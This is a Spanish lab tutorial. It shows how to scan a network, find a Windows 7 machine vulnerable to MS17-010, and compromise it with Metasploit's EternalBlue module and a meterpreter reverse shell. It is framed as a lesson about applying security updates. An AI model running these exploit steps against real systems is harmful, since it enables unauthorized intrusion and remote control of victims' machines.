Hackeando Windows 7


Hackeando Windows 7: Si eres de los que no les gusta actualizar su Windows por X motivo, creo que con esta guía lo pensarás 2 veces.

Esto lo haré dentro de la red que tengo de pruebas con un Windows 7 recién instalado.

Primero conoceremos los equipos conectados a la red con el siguiente comando:

netdiscover -d -P -N -r 192.168.0.0/24

Al aplicar el comando nos mostrará algo similar a la siguiente imagen:

Son todos los equipos conectados en ese momento a la red. Lo que sigue es ver cuál de estos equipos es vulnerable a algún ataque.

Por cada equipo aplicamos el siguiente comando:

nmap -sC -sV -p 445 --script smb-vuln-ms17-010.nse 192.168.0.13

Con esto buscamos los equipos cuyo protocolo SMBv1 es vulnerable a ataques.

Si el equipo es vulnerable, nos mostrará una pantalla como la siguiente:

Sabiendo que es vulnerable, ahora nos queda atacarlo.

Iniciamos el servicio postgresql:

service postgresql start

Conectamos la base de datos de metasploit:

msfdb init

Vamos a metasploit con el comando:

msfconsole

Ahora le diremos a metasploit que usaremos el exploit de eternalblue:

use exploit/windows/smb/ms17_010_eternalblue

Luego agregamos el IP de la victima

set RHOST 192.168.0.13

Se inyecta el payload:

set payload windows/x64/meterpreter/reverse_tcp

Se ingresa el IP desde donde hacemos el ataque:

set LHOST 192.168.0.12

Y por último, se lanza el exploit:

exploit

Si todo funciona, podremos ver lo siguiente:

Ya estamos dentro del equipo y hackeando Windows 7 sin actualizar.

Para comprobar, podemos utilizar el comando sysinfo y nos mostrará lo siguiente:

Existen muchos comandos que pueden ver aplicando el comando help. Acá dejare la captura de uno que ya los dejará dentro del mismo sistema:

La idea de esta guía es que se tome conciencia de lo importante que es actualizar nuestro sistema operativo, ya que no es sólo para incluir mejoras sino que para “parchar” las vulnerabilidades que se encuentren en el tiempo.

La guía está realizada con máquinas virtuales y no se ha vulnerado ningún sistema externo.